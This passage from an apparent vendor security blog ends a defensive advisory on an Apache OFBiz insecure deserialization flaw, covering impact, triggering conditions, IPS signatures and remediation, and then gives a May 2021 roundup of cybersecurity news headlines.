  Successful exploitation of this vulnerability could result in arbitrary code execution in the context of the user running the application.

Triggering the Problem:

  • The target must be running a vulnerable version of the software.
  • The attacker must have network connectivity to the vulnerable server.

Triggering Conditions:

  The attacker sends an HTTP request containing a maliciously crafted serialized object within the SOAP data to
the affected target. The vulnerability is triggered when the server deserializes the data.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTPS, over ports 8080/TCP, 8443/TCP

SonicWall’s, (IPS) Intrusion Prevention System, provides protection against this threat:

  • IPS: 14804 Apache OFBiz Insecure Deserialization 1
  • IPS: 14805 Apache OFBiz Insecure Deserialization 2
  • IPS: 15485 Apache OFBiz Insecure Deserialization 3
  • IPS: 15548 Apache OFBiz Insecure Deserialization 4
  • IPS: 15549 Apache OFBiz Insecure Deserialization 5

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Blocking communication between Apache OFBiz and untrusted networks.
    • Update to a non-vulnerable version of the product.
    • Filter attack traffic.

The vendor has released the following advisory regarding this vulnerability:
https://ofbiz.apache.org/security.htm

Cybersecurity News & Trends – 05-07-21

/0 Comments/in /by

This week’s news was full of attacks on government — including the Alaskan state government, the Belgian federal government and the U.S. Agency for Global Media.

SonicWall in the News

SonicWall capture ATP aces latest ICSA Lab test, finds more malware — The Evolving Enterprise

  • After 35 days of testing and 1,741 total tests, the multi-engine SonicWall Capture ATP sandbox service with RTDMI received a perfect score in the latest ICSA Labs Advanced Threat Defense test.

Video: 10 Minute IT Jams – SonicWall manager dissects zero trust security — Security Brief Asia

  • SonicWall Head of Presales for APAC Yuvraj Pradhan discusses the importance of zero-trust and its role in the future of cybersecurity.

Industry News

Belgian government, parliament, colleges hit by cyberattack — The Washington Times

  • The company providing internet services for Belgium’s parliament, government agencies, universities and scientific institutions announced that its network was under cyberattack.

CISA used new subpoena power to contact US companies vulnerable to hacking — Cyberscoop

  • The Department of Homeland Security’s cybersecurity agency used a new subpoena power for the first time to contact at least one U.S. internet service provider with customers whose software is vulnerable to hacking.

New Spectre attack once again sends Intel and AMD scrambling for a fix — Ars Technica

  • A new transient execution variant is the first exploit micro-ops caches.

Panda Stealer dropped in Excel files, spreads through Discord to steal user cryptocurrency — ZDNet

  • The malware hones in on cryptocurrency funds as well as VPN credentials.

U.S. Agency for Global Media data breach caused by a phishing attack — Bleeping Computer

  • The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries.

Alaska Court System briefly forced offline amid cyber threat — The Washington Times

  • The Alaska court system has temporarily disconnected most of its operations from the internet after a cybersecurity threat on Saturday, including attacks on its website and the removal of the ability to look up court records.

TurgenSec finds 345,000 files from Filipino solicitor-general’s office were breached — ZDNet

  • Sensitive documents from the solicitor-general of the Philippines, including information on ongoing legal cases and passwords, were breached and made publicly available online, a UK security firm has said.

Digital Dollar Project to launch five U.S. central bank digital currency pilots — The Wall Street Journal

  • The U.S. nonprofit Digital Dollar Project said on Monday it will launch five pilot programs over the next 12 months to test the potential uses of a U.S. central bank digital currency, the first effort of its kind in the United States.

NSA Issues Guidance on Securing IT-OT Connectivity — Security Week

  • The NSA’s advisory, “Stop Malicious Cyber Activity Against Connected Operational Technology,” addresses the Department of Defense, national security system and defense industrial base organizations — but the recommendations can be useful to any industrial company.

Pulse Secure fixes VPN zero-day used to hack high-value targets — Bleeping Computer

  • Pulse Secure has fixed a zero-day vulnerability in the Pulse Connect Secure (PCS) SSL VPN appliance that is being actively exploited to compromise the internal networks of defense firms and government agencies.

New Buer Malware Downloader Rewritten in E-Z Rust Language — Threat Post

  • It’s coming in emails disguised as DHL Support shipping notices and is apparently getting prepped for leasing on the underground.

Codecov starts notifying customers affected by supply-chain attack — Cyberscoop

  • Codecov has started notifying the maintainers of software repositories, via both email and the Codecov application interface, that the company believes the affected repositories were downloaded by threat actors.

US prosecutors fine German software company for violating sanctions against Iran — The Hill

  • Software giant SAP SE agreed to pay over $8 million as part of the resolution with the Department of Justice, Commerce Department and Treasury Department, authorities said.

Researchers find two dozen bugs in software used in medical and industrial devices — Cyberscoop

  • Microsoft researchers have discovered some two dozen vulnerabilities in software embedded in popular medical and industrial devices that an attacker could use to breach those devices, and in some cases cause them to crash.

In Case You Missed It